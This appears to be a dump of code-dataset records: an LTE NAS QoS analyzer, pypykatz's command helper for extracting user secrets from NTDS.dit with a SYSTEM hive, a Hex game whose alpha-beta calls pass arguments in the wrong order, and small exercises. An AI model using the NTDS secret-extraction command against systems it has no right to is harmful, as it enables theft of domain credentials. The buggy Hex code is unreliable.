msg: the ESM NAS message\n \"\"\"\n\n if self.callflow_state_machine.update_state(msg):\n self.log_info(\"Call flow status: \" + str(self.callflow_state_machine.get_current_state()))\n\n for field in msg.data.iter('field'):\n\n if field.get('name')==\"nas_eps.bearer_id\":\n self.__cur_eps_id = int(field.get('show'))\n if self.__cur_eps_id not in self.__esm_status:\n self.__esm_status[self.__cur_eps_id]=EsmStatus()\n\n if field.get('name')==\"nas_eps.emm.qci\":\n self.__esm_status[self.__cur_eps_id].qos.qci=int(field.get('show'))\n\n if field.get('show')==\"Quality Of Service - Negotiated QoS\" \\\n or field.get('show')==\"Quality Of Service - New QoS\" \\\n or field.get('show')==\"Quality Of Service - Requested QoS\":\n\n field_val={}\n\n for val in field.iter('field'):\n field_val[val.get('name')]=val.get('show')\n\n self.__esm_status[self.__cur_eps_id].eps_id = int(self.__cur_eps_id)\n if 'gsm_a.gm.sm.qos.delay_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.delay_class=int(field_val['gsm_a.gm.sm.qos.delay_cls'])\n\n if 'gsm_a.gm.sm.qos.reliability_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.reliability_class=int(field_val['gsm_a.gm.sm.qos.reliability_cls'])\n\n if 'gsm_a.gm.sm.qos.prec_class' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.precedence_class=int(field_val['gsm_a.gm.sm.qos.prec_class'])\n\n if 'gsm_a.gm.sm.qos.peak_throughput' in field_val:\n #10.5.6.5, TS24.008\n self.__esm_status[self.__cur_eps_id].qos.peak_tput=1000*pow(2,int(field_val['gsm_a.gm.sm.qos.peak_throughput'])-1)\n\n if 'gsm_a.gm.sm.qos.mean_throughput' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.mean_tput=mean_tput[int(field_val['gsm_a.gm.sm.qos.mean_throughput'])]\n\n if 'gsm_a.gm.sm.qos.traffic_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.traffic_class=int(field_val['gsm_a.gm.sm.qos.traffic_cls'])\n\n if 'gsm_a.gm.sm.qos.del_order' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.delivery_order=int(field_val['gsm_a.gm.sm.qos.del_order'])\n\n if 'gsm_a.gm.sm.qos.traff_hdl_pri' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.traffic_handling_priority=int(field_val['gsm_a.gm.sm.qos.traff_hdl_pri'])\n\n if 'gsm_a.gm.sm.qos.ber' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.residual_ber=residual_ber[int(field_val['gsm_a.gm.sm.qos.ber'])]\n\n if 'gsm_a.gm.sm.qos.trans_delay' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.transfer_delay=trans_delay(int(field_val['gsm_a.gm.sm.qos.trans_delay']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_upl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.max_bitrate_upl']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_downl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.max_bitrate_downl']))\n\n if 'gsm_a.gm.sm.qos.guar_bitrate_upl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_upl']))\n\n if 'gsm_a.gm.sm.qos.guar_bitrate_downl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_downl']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_upl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.max_bitrate_upl_ext']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_downl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.max_bitrate_downl_ext']))\n if 'gsm_a.gm.sm.qos.guar_bitrate_upl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_upl_ext']))\n if 'gsm_a.gm.sm.qos.guar_bitrate_downl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_downl_ext']))\n\n self.log_info(\"EPS_Id=\"+str(self.__cur_eps_id)+self.__esm_status[self.__cur_eps_id].dump())\n\n # profile update for esm qos\n self.profile.update(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type],\n {\n 'delay_class':xstr(self.__esm_status[self.__cur_eps_id].qos.delay_class),\n 'reliability_class':xstr(self.__esm_status[self.__cur_eps_id].qos.reliability_class),\n 'precedence_class':xstr(self.__esm_status[self.__cur_eps_id].qos.precedence_class),\n 'peak_tput':xstr(self.__esm_status[self.__cur_eps_id].qos.peak_tput),\n 'mean_tput':xstr(self.__esm_status[self.__cur_eps_id].qos.mean_tput),\n 'traffic_class':xstr(self.__esm_status[self.__cur_eps_id].qos.traffic_class),\n 'delivery_order':xstr(self.__esm_status[self.__cur_eps_id].qos.delivery_order),\n 'traffic_handling_priority':xstr(self.__esm_status[self.__cur_eps_id].qos.traffic_handling_priority),\n 'residual_ber':xstr(self.__esm_status[self.__cur_eps_id].qos.residual_ber),\n 'transfer_delay':xstr(self.__esm_status[self.__cur_eps_id].qos.transfer_delay),\n 'max_bitrate_ulink':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink),\n 'max_bitrate_dlink':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink),\n 'guaranteed_bitrate_ulink':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink),\n 'guaranteed_bitrate_dlink':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink),\n 'max_bitrate_ulink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext),\n 'max_bitrate_dlink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext),\n 'guaranteed_bitrate_ulink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext),\n 'guaranteed_bitrate_dlink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext),\n })\n if self.__cur_eps_id in self.__esm_status:\n self.log_info(str(self.__esm_status[self.__cur_eps_id].qos.dump_rate()))\n self.log_info(str(self.__esm_status[self.__cur_eps_id].qos.dump_delivery()))\n self.broadcast_info('QOS_DELIVERY', self.__esm_status[self.__cur_eps_id].qos.dump_delivery_dict())\n self.broadcast_info('QOS_RATE', self.__esm_status[self.__cur_eps_id].qos.dump_rate_dict())\n\n\n def getTimeInterval(self, preTime, curTime):\n # preTime_parse = dt.strptime(preTime, '%Y-%m-%d %H:%M:%S.%f')\n # curTime_parse = dt.strptime(curTime, '%Y-%m-%d %H:%M:%S.%f')\n return (curTime - preTime).total_seconds() * 1000000.0\n\n def get_qos(self):\n # return self.__esm_status.qos\n if self.__cur_eps_id in self.__esm_status:\n return self.__esm_status[self.__cur_eps_id].qos\n else:\n #Check if QoS profile exists in data base\n return None\n\n def get_profiled_qos(self,plmn):\n \"\"\"\n Get QoS from the profile (if any)\n \"\"\"\n if plmn:\n tmp = self.profile.query(\"LteNasProfile:\"+xstr(plmn)+\".eps.qos:default\")\n # tmp = self.profile.query(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type])\n if not tmp:\n return None\n f_qos_int = lambda x: int(x) if x and x!=\"unknown\" else None\n f_qos_float = lambda x: float(x) if x and x!=\"unknown\" else None\n res = EsmQos()\n res.qci=f_qos_int(tmp['qci'])\n res.delay_class=f_qos_int(tmp['delay_class'])\n res.reliability_class=f_qos_int(tmp['reliability_class'])\n res.precedence_class=f_qos_int(tmp['precedence_class'])\n res.peak_tput=f_qos_int(tmp['peak_tput'])\n res.mean_tput=tmp['mean_tput']\n res.traffic_class=f_qos_int(tmp['traffic_class'])\n res.delivery_order=f_qos_int(tmp['delivery_order'])\n res.transfer_delay=f_qos_int(tmp['transfer_delay'])\n res.traffic_handling_priority=f_qos_int(tmp['traffic_handling_priority'])\n res.max_bitrate_ulink=f_qos_int(tmp['max_bitrate_ulink'])\n res.max_bitrate_dlink=f_qos_int(tmp['max_bitrate_dlink'])\n res.guaranteed_bitrate_ulink=f_qos_int(tmp['guaranteed_bitrate_ulink'])\n res.guaranteed_bitrate_dlink=f_qos_int(tmp['guaranteed_bitrate_dlink'])\n res.max_bitrate_ulink_ext=f_qos_int(tmp['max_bitrate_ulink_ext'])\n res.max_bitrate_dlink_ext=f_qos_int(tmp['max_bitrate_dlink_ext'])\n res.guaranteed_bitrate_ulink_ext=f_qos_int(tmp['guaranteed_bitrate_ulink_ext'])\n res.guaranteed_bitrate_dlink_ext=f_qos_int(tmp['guaranteed_bitrate_dlink_ext'])\n res.residual_ber=f_qos_float(tmp['residual_ber'])\n return res\n else:\n return None\n\n # if self.__cur_eps_id:\n # tmp = self.profile.query(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type])\n # print tmp\n # else:\n # return None\n\nclass EmmStatus:\n \"\"\"\n An abstraction to maintain the EMM status, including the registeration states,\n temporary IDs (GUTI), security options, etc.\n \"\"\"\n def __init__(self):\n self.state = \"null\"\n self.substate = \"null\"\n self.guti = Guti()\n self.ciphering = None\n self.integrity = None\n self.timestamp = None\n\n def inited(self):\n return (self.state and self.substate and self.guti.inited())\n\n def profile_id(self):\n \"\"\"\n Return a globally unique id (MCC-MNC-MMEGI-MMEC) for profiling\n \"\"\"\n if not self.guti.inited():\n return None\n else:\n return (str(self.guti.mcc)\n + '-' + str(self.guti.mnc)\n )\n\n # return (str(self.guti.mcc)\n # + '-' + str(self.guti.mnc)\n # + '-' + str(int(self.guti.mme_group_id,0))\n # + '-' + str(int(self.guti.mme_code,0)))\n\n def dump(self):\n \"\"\"\n Report the EMM status\n\n :returns: a string that encodes EMM status\n \"\"\"\n\n return (self.__class__.__name__\n + ' EMM.state='+xstr(self.state) + ' EMM.substate='+xstr(self.substate)\n + ' MCC=' + xstr(self.guti.mcc) + ' MNC=' + xstr(self.guti.mnc)\n + ' MMEGI=' + xstr(self.guti.mme_group_id) + ' MMEC=' + xstr(self.guti.mme_code)\n + ' TMSI=' + xstr(self.guti.m_tmsi))\n\n\nclass Guti:\n \"\"\"\n An abstraction to maintain Globally Unique Temporary ID (GUTI)\n \"\"\"\n def __init__(self):\n self.mcc=None\n self.mnc=None\n self.mme_group_id=None\n self.mme_code=None\n self.m_tmsi=None\n\n def inited(self):\n \"\"\"\n Return true if all GUTI fileds are initialized\n \"\"\"\n return (self.mcc and self.mnc and self.mme_group_id \\\n and self.mme_code and self.m_tmsi)\n\n\nclass EsmStatus:\n \"\"\"\n An abstraction to maintain the ESM status\n \"\"\"\n def __init__(self):\n self.eps_id = None\n self.type = 0 #default or dedicated\n self.qos=EsmQos()\n self.timestamp = None\n\n def dump(self):\n # TODO: deal with potential KeyError here\n dump_text = ' EPS_ID=' + xstr(self.eps_id) + ' type=' + xstr(bearer_type[self.type]) \\\n + \":\\n\\t\"+self.qos.dump_rate()+'\\n\\t'+self.qos.dump_delivery()\n return dump_text\n\nclass EsmQos:\n \"\"\"\n An abstraction for ESM QoS profiles\n \"\"\"\n def __init__(self):\n self.qci=None\n self.delay_class=None\n self.reliability_class=None\n self.precedence_class=None\n self.peak_tput=None\n self.mean_tput=None\n self.traffic_class=None\n self.delivery_order=None\n self.transfer_delay=None\n self.traffic_handling_priority=None\n self.max_bitrate_ulink=None\n self.max_bitrate_dlink=None\n self.guaranteed_bitrate_ulink=None\n self.guaranteed_bitrate_dlink=None\n self.max_bitrate_ulink_ext=None\n self.max_bitrate_dlink_ext=None\n self.guaranteed_bitrate_ulink_ext=None\n self.guaranteed_bitrate_dlink_ext=None\n self.residual_ber=None\n\n def dump_rate(self):\n \"\"\"\n Report the data rate profile in ESM QoS, including the peak/mean throughput,\n maximum downlink/uplink data rate, guaranteed downlink/uplink data rate, etc.\n\n :returns: a string that encodes all the data rate\n :rtype: string\n \"\"\"\n return (self.__class__.__name__\n + ' peak_tput=' + xstr(self.peak_tput) + ' mean_tput=' + xstr(self.mean_tput)\n + ' max_bitrate_ulink=' + xstr(self.max_bitrate_ulink) + ' max_bitrate_dlink=' + xstr(self.max_bitrate_dlink)\n + ' guaranteed_birate_ulink=' + xstr(self.guaranteed_bitrate_ulink) + ' guaranteed_birate_dlink=' + xstr(self.guaranteed_bitrate_dlink)\n + ' max_bitrate_ulink_ext=' + xstr(self.max_bitrate_ulink_ext) + ' max_bitrate_dlink_ext=' + xstr(self.max_bitrate_dlink_ext)\n + ' guaranteed_birate_ulink_ext=' + xstr(self.guaranteed_bitrate_ulink_ext) + ' guaranteed_birate_dlink_ext=' + xstr(self.guaranteed_bitrate_dlink_ext))\n\n def dump_rate_dict(self):\n \"\"\"\n Report the data rate profile in ESM QoS, including the peak/mean throughput,\n maximum downlink/uplink data rate, guaranteed downlink/uplink data rate, etc.\n\n :returns: a dict that encodes all the data rate\n :rtype: dict\n \"\"\"\n res = {}\n res['peak_tput'] = xstr(self.peak_tput)\n res['mean_tput'] = xstr(self.mean_tput)\n res['max_bitrate_ulink'] = xstr(self.peak_tput)\n res['max_bitrate_dlink'] = xstr(self.max_bitrate_dlink)\n res['guaranteed_birate_ulink'] = xstr(self.guaranteed_bitrate_ulink)\n res['guaranteed_birate_dlink'] = xstr(self.guaranteed_bitrate_dlink)\n res['max_bitrate_ulink_ext'] = xstr(self.max_bitrate_ulink_ext)\n res['max_bitrate_dlink_ext'] = xstr(self.max_bitrate_dlink_ext)\n res['guaranteed_birate_ulink_ext'] = xstr(self.guaranteed_bitrate_ulink_ext)\n res['guaranteed_birate_dlink_ext'] = xstr(self.guaranteed_bitrate_dlink_ext)\n return res\n\n def dump_delivery(self):\n \"\"\"\n Report the delivery profile in ESM QoS, including delivery order guarantee,\n traffic class, QCI, delay class, transfer delay, etc.\n\n :returns: a string that encodes all the data rate, or None if not ready\n :rtype: string\n \"\"\"\n\n if self.delivery_order:\n order = delivery_order[self.delivery_order]\n else:\n order = None\n if self.traffic_class:\n tra_class = traffic_class[self.traffic_class]\n else:\n tra_class = None\n return (self.__class__.__name__\n + ' delivery_order=' + xstr(order)\n + ' traffic_class=' + xstr(tra_class)\n + ' QCI=' + xstr(self.qci) + ' delay_class=' + xstr(self.delay_class)\n + ' transfer_delay=' + xstr(self.transfer_delay) + ' residual_BER=' + xstr(self.residual_ber))\n\n def dump_delivery_dict(self):\n \"\"\"\n Report the delivery profile in ESM QoS, including delivery order guarantee,\n traffic class, QCI, delay class, transfer delay, etc.\n\n :returns: a string that encodes all the data rate, or None if not ready\n :rtype: string\n \"\"\"\n\n if self.delivery_order:\n order = delivery_order[self.delivery_order]\n else:\n order = None\n if self.traffic_class:\n tra_class = traffic_class[self.traffic_class]\n else:\n tra_class = None\n res = {}\n res['delivery_order'] = xstr(order)\n res['traffic_class'] = xstr(tra_class)\n res['QCI'] = xstr(self.qci)\n res['delay_class'] = xstr(self.delay_class)\n res['transfer_delay'] = xstr(self.transfer_delay)\n res['residual_BER'] = xstr(self.residual_ber)\n return res\n\ndef LteNasProfileHierarchy():\n '''\n Return a Lte Nas ProfileHierarchy (configurations)\n\n :returns: ProfileHierarchy for LTE NAS\n '''\n\n profile_hierarchy = ProfileHierarchy('LteNasProfile')\n root = profile_hierarchy.get_root()\n eps = root.add('eps',False)\n\n qos = eps.add('qos',True) #Active-state configurations (indexed by EPS type: default or dedicated)\n\n #QoS parameters\n qos.add('qci',False)\n qos.add('delay_class',False)\n qos.add('reliability_class',False)\n qos.add('precedence_class',False)\n qos.add('peak_tput',False)\n qos.add('mean_tput',False)\n qos.add('traffic_class',False)\n qos.add('delivery_order',False)\n qos.add('transfer_delay',False)\n qos.add('traffic_handling_priority',False)\n qos.add('max_bitrate_ulink',False)\n qos.add('max_bitrate_dlink',False)\n qos.add('guaranteed_bitrate_ulink',False)\n qos.add('guaranteed_bitrate_dlink',False)\n qos.add('max_bitrate_ulink_ext',False)\n qos.add('max_bitrate_dlink_ext',False)\n qos.add('guaranteed_bitrate_ulink_ext',False)\n qos.add('guaranteed_bitrate_dlink_ext',False)\n qos.add('residual_ber',False)\n\n return profile_hierarchy","repo_name":"mobile-insight/mobileinsight-core","sub_path":"mobile_insight/analyzer/lte_nas_analyzer.py","file_name":"lte_nas_analyzer.py","file_ext":"py","file_size_in_byte":35565,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"53"} +{"seq_id":"20123888632","text":"\n\n#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport asyncio\nimport platform\nfrom tqdm import tqdm\n\nasync def flush_buffer(buffer, outfile_handle = None):\n\ttry:\n\t\tif outfile_handle is not None:\n\t\t\tres = ''\n\t\t\tfor secret in buffer:\n\t\t\t\ttry:\n\t\t\t\t\tres += str(secret)\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\t\toutfile_handle.write(res)\n\t\telse:\n\t\t\tfor secret in buffer:\n\t\t\t\ttry:\n\t\t\t\t\tprint(str(secret))\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\t\n\t\tbuffer = []\n\t\treturn True, None\n\texcept Exception as e:\n\t\treturn None, e\n\nclass ParsersCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['parser']\n\t\tself.keywords = ['parser']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tparser_group = parser.add_parser('parser', help='SMB related commands')\n\t\tparser_subparsers = parser_group.add_subparsers()\n\t\tparser_subparsers.required = True\n\t\tparser_subparsers.dest = 'parser_module'\n\n\t\tntds_group = parser_subparsers.add_parser('ntds', help='NTDS.dit file parser, extracting secrets')\n\t\tntds_group.add_argument('ntdsfile', help=\"NTDS.dit file\")\n\t\tntds_group.add_argument('systemhive', help=\"SYSTEM hive file or the Bootkey(in hex). This is needed to decrypt the secrets\")\n\t\tntds_group.add_argument('-p', '--progress', action='store_true', help=\"Show progress bar. Please use this only if you also specified an output file.\")\n\t\tntds_group.add_argument('-o', '--outfile', help='Output file. If omitted secrets will be printed to STDOUT')\n\t\tntds_group.add_argument('--strict', action='store_true', help='Strict parsing. Fails on errors')\n\t\tntds_group.add_argument('--no-history', action='store_true', help='Do not parse history')\n\t\t\n\t\t\n\tdef execute(self, args):\n\t\tif args.command in self.keywords:\n\t\t\tasyncio.run(self.run(args))\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tasyncio.run(self.run_live(args))\n\t\t\t\n\t\t\t\n\tasync def run_live(self, args):\n\t\tif platform.system().lower() != 'windows':\n\t\t\traise Exception('Live commands only work on Windows!')\n\t\t\t\n\tasync def run(self, args):\n\t\tif args.parser_module == 'ntds':\n\t\t\tfrom aesedb.examples.ntdsparse import NTDSParserConsole\n\t\t\tntdscon = NTDSParserConsole(\n\t\t\t\targs.systemhive,\n\t\t\t\targs.ntdsfile,\n\t\t\t\tignore_errors=args.strict,\n\t\t\t\twith_history=not args.no_history\n\t\t\t)\n\n\t\t\tbuffer = []\n\t\t\tbuffer_size = 1000\n\t\t\ttotal = await ntdscon.get_total_rows()\n\t\t\tif args.progress is True:\n\t\t\t\tpbar = tqdm(desc='JET table parsing ', total=total, unit='records', miniters= total//200 ,position=0)\n\t\t\t\tpbar_sec = tqdm(desc='User secrets found', unit = '', miniters=buffer_size//10 ,position=1)\n\n\t\t\toutfile_handle = None\n\t\t\tif args.outfile is not None:\n\t\t\t\toutfile_handle = open(args.outfile, 'w', newline = '')\n\n\t\t\tasync for secret, err in ntdscon.get_secrets():\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\n\t\t\t\tif args.progress is True:\n\t\t\t\t\tpbar.update()\n\t\t\t\t\t\n\t\t\t\tif secret is None:\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\tif args.progress is True:\n\t\t\t\t\tpbar_sec.update()\n\t\t\t\t\t\n\n\t\t\t\tbuffer.append(secret)\n\t\t\t\tif len(buffer) > buffer_size:\n\t\t\t\t\t_, err = await flush_buffer(buffer, outfile_handle)\n\t\t\t\t\tbuffer = []\n\t\t\t\t\tif err is not None:\n\t\t\t\t\t\traise err\n\n\t\t\t\t\n\t\t\t_, err = await flush_buffer(buffer, outfile_handle)\n\t\t\tbuffer = []\n\t\t\tif err is not None:\n\t\t\t\traise err\n\n\n\t\t\t#parser = NTDSParserConsole(args.systemhive, args.ntdsfile, show_progress = args.progress, outfile = args.outfile)\n\t\t\t#await parser.run()\n\n\t\t","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/parsers/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"28140422187","text":"from hex_skeleton import HexBoard\r\nimport random as rd\r\nimport numpy as np\r\nimport pandas as pd\r\nimport copy\r\nfrom trueskill import Rating, quality_1vs1, rate_1vs1\r\n\r\nSIZE = 4\r\nEMPTY = HexBoard.EMPTY\r\nINF = 99\r\nagent1 = HexBoard.BLUE\r\nagent2 = HexBoard.RED\r\n\r\ndf_alphabeta = pd.DataFrame(columns=['d', 'g', 'a', 'b']) # store d,g,a,b values\r\ndf_movelist = pd.DataFrame(columns=['x', 'y']) # store movelist of player and AI\r\n\r\n\r\ndef alphabeta(board, d, a, b, method, agent1, agent2, type_max=True):\r\n global df_alphabeta, df_movelist\r\n if d <= 0:\r\n return eval(board, method)\r\n elif type_max == True:\r\n g = -INF\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n\r\n if board.is_empty((i, j)):\r\n board.place((i, j), agent1)\r\n\r\n g_star = g\r\n g = max(g, alphabeta(board, d - 1, a, b, method, agent1, agent2, type_max=False))\r\n a = max(a, g) # Update alpha.\r\n\r\n df_alphabeta = df_alphabeta.append({'d': d, 'g': g, 'a': a, 'b': b}, ignore_index=True)\r\n\r\n if g > g_star:\r\n best_move = (i, j)\r\n board.clear((i, j))\r\n\r\n if a >= b: # g>=b\r\n break\r\n\r\n elif type_max == False:\r\n g = INF\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n\r\n if board.is_empty((i, j)):\r\n board.place((i, j), agent2)\r\n\r\n g = min(g, alphabeta(board, d - 1, a, b, agent1, agent2, method, type_max=True))\r\n b = min(b, g) # Update beta\r\n\r\n df_alphabeta = df_alphabeta.append({'d': d, 'g': g, 'a': a, 'b': b}, ignore_index=True)\r\n\r\n board.clear((i, j))\r\n\r\n if a >= b: # a>=g\r\n break\r\n if d == DEPTH:\r\n df_movelist = df_movelist.append({'x': best_move[0], 'y': best_move[1]}, ignore_index=True)\r\n return g\r\n\r\n\r\n\r\ndef eval(board, method):\r\n if method == 'random':\r\n random_number = rd.randint(1, 9)\r\n return random_number\r\n else:\r\n a1_heur_val = dijkstra_sp(board, player=agent1)\r\n a2_heur_val = dijkstra_sp(board, player=agent2)\r\n return a2_heur_val - a1_heur_val\r\n\r\n\r\ndef dijkstra_sp(board, player):\r\n initial = []\r\n\r\n if player == agent1:\r\n for i in range(SIZE):\r\n initial.append((0, i))\r\n if player == agent2:\r\n for i in range(SIZE):\r\n initial.append((i, 0))\r\n\r\n # Make a distance graph.\r\n distance_graph = np.zeros((SIZE, SIZE))\r\n distance_graph.fill(INF)\r\n\r\n for i in range(len(initial)):\r\n now = initial[i]\r\n visited = []\r\n distance_graph[now[1], now[0]] = 0\r\n\r\n if player == agent1:\r\n a1_update_d(board, now, distance_graph, visited)\r\n if player == agent2:\r\n a2_update_d(board, now, distance_graph, visited)\r\n\r\n if player == agent1:\r\n return min(distance_graph[:, -1])\r\n if player == agent2:\r\n return min(distance_graph[-1])\r\n\r\n\r\ndef a1_update_d(board, now, distance_graph, visited):\r\n border_reached = False\r\n\r\n if board.border(agent1, now) == True:\r\n border_reached = True\r\n\r\n cur_distance = distance_graph[now[1], now[0]]\r\n shortest = INF\r\n next = []\r\n\r\n neighbors = board.get_neighbors(now)\r\n\r\n for i in range(len(neighbors)):\r\n if neighbors[i] not in visited and board.is_color(neighbors[i], agent2) == False:\r\n next_distance = cur_distance + 1\r\n\r\n if board.is_color(neighbors[i], agent1) == True and cur_distance < distance_graph[\r\n neighbors[i][1], neighbors[i][0]]:\r\n distance_graph[neighbors[i][1], neighbors[i][0]] = cur_distance\r\n next = neighbors[i]\r\n shortest = cur_distance\r\n elif next_distance < distance_graph[neighbors[i][1], neighbors[i][0]]:\r\n distance_graph[neighbors[i][1], neighbors[i][0]] = next_distance\r\n\r\n if next_distance < shortest:\r\n next = neighbors[i]\r\n shortest = next_distance\r\n\r\n visited.append(now)\r\n\r\n if (now[0] + 1, now[1]) in neighbors:\r\n for i in range(len(neighbors)):\r\n if board.is_color(neighbors[i], agent1) == True:\r\n break\r\n else:\r\n next = (now[0] + 1, now[1])\r\n\r\n if len(next) != 0 and border_reached == False:\r\n a1_update_d(board, next, distance_graph, visited)\r\n\r\n\r\ndef a2_update_d(board, now, distance_graph, visited):\r\n border_reached = False\r\n\r\n if board.border(agent2, now) == True:\r\n border_reached = True\r\n\r\n cur_distance = distance_graph[now[1], now[0]]\r\n shortest = INF\r\n next = []\r\n\r\n neighbors = board.get_neighbors(now)\r\n\r\n for i in range(len(neighbors)):\r\n if neighbors[i] not in visited and board.is_color(neighbors[i], agent1) == False:\r\n next_distance = cur_distance + 1\r\n\r\n if board.is_color(neighbors[i], agent2) == True and cur_distance < distance_graph[\r\n neighbors[i][1], neighbors[i][0]]:\r\n distance_graph[neighbors[i][1], neighbors[i][0]] = cur_distance\r\n next = neighbors[i]\r\n shortest = cur_distance\r\n elif next_distance < distance_graph[neighbors[i][1], neighbors[i][0]]:\r\n distance_graph[neighbors[i][1], neighbors[i][0]] = next_distance\r\n\r\n if next_distance < shortest:\r\n next = neighbors[i]\r\n shortest = next_distance\r\n\r\n visited.append(now)\r\n\r\n if (now[0], now[1] + 1) in neighbors:\r\n for i in range(len(neighbors)):\r\n if board.is_color(neighbors[i], agent2) == True:\r\n break\r\n else:\r\n next = (now[0], now[1] + 1)\r\n\r\n if len(next) != 0 and border_reached == False:\r\n a2_update_d(board, next, distance_graph, visited)\r\n\r\n\r\ndef ai_make_move(board):\r\n move = df_movelist.to_numpy()\r\n x = move[-1, 0]\r\n y = move[-1, 1]\r\n\r\n make_move = (int(x), int(y))\r\n board.place(make_move, agent1)\r\n board.print()\r\n\r\n\r\ndef pl_make_move(board):\r\n global df_movelist\r\n print('Next move.')\r\n x = int(ord(input(' x(a,b,c...): ')) - 97)\r\n y = int(input(' y(0,1,2...): '))\r\n\r\n while not board.is_empty((x, y)):\r\n print('Invaild place, input again!!!')\r\n x = int(ord(input(' x(a,b,c...): ')) - 97)\r\n y = int(input(' y(0,1,2...): '))\r\n\r\n df_movelist = df_movelist.append({'x': x, 'y': y}, ignore_index=True)\r\n\r\n board.place((x, y), agent2)\r\n board.print()\r\n\r\n\r\n# Play the game.\r\ndef play_game(board, method):\r\n for i in range(SIZE * SIZE):\r\n board_copy = copy.deepcopy(board)\r\n\r\n eval_val = alphabeta(board_copy, DEPTH, -INF, INF, agent1, agent2, method)\r\n df_alphabeta.to_csv('alphabeta.txt', index=False, mode='a')\r\n ai_make_move(board)\r\n if board.check_win(agent1):\r\n print('A1 WINS')\r\n break\r\n\r\n pl_make_move(board)\r\n if board.check_win(agent2):\r\n print('A2 WINS')\r\n break\r\n\r\n\r\nDEPTH = 3\r\nboard = HexBoard(SIZE)\r\n\r\nplay_game(board, 'Dijkstra')\r\n","repo_name":"Pengyu-Liu/RL","sub_path":"Hexgame/ourHexGame.py","file_name":"ourHexGame.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605619207","text":"\"\"\"\nСоздайте класс-генератор.\nЭкземпляр класса должен генерировать факториал числа в\nдиапазоне от start до stop с шагом step.\nЕсли переданы два параметра, считаем step=1.\nЕсли передан один параметр, также считаем start=1.\n\n\"\"\"\nfrom sem12.t_1 import FactorialOf\n\n\nclass FactorialIterator:\n def __init__(self, stop_i: int, start_i=1, step: int = 1):\n self._st = start_i\n self._end = stop_i\n self._step = step\n\n def __iter__(self):\n return self\n\n def __next__(self):\n while self._st < self._end:\n self._st += self._step\n return FactorialOf(self._st).out\n raise StopIteration\n\n\nif __name__ == '__main__':\n a = iter(FactorialIterator(10))\n for item in a:\n print(item)\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem12/t_3.py","file_name":"t_3.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70963285609","text":"# soln 1 **********************************BEST SOLN *********************************\n\nclass Solution(object):\n def searchInsert(self, nums, target):\n '''\n - use binary search.\n - use left and right pointer to get mid...\n - (left + right )/ 2 to get mid.\n - compare mid with the 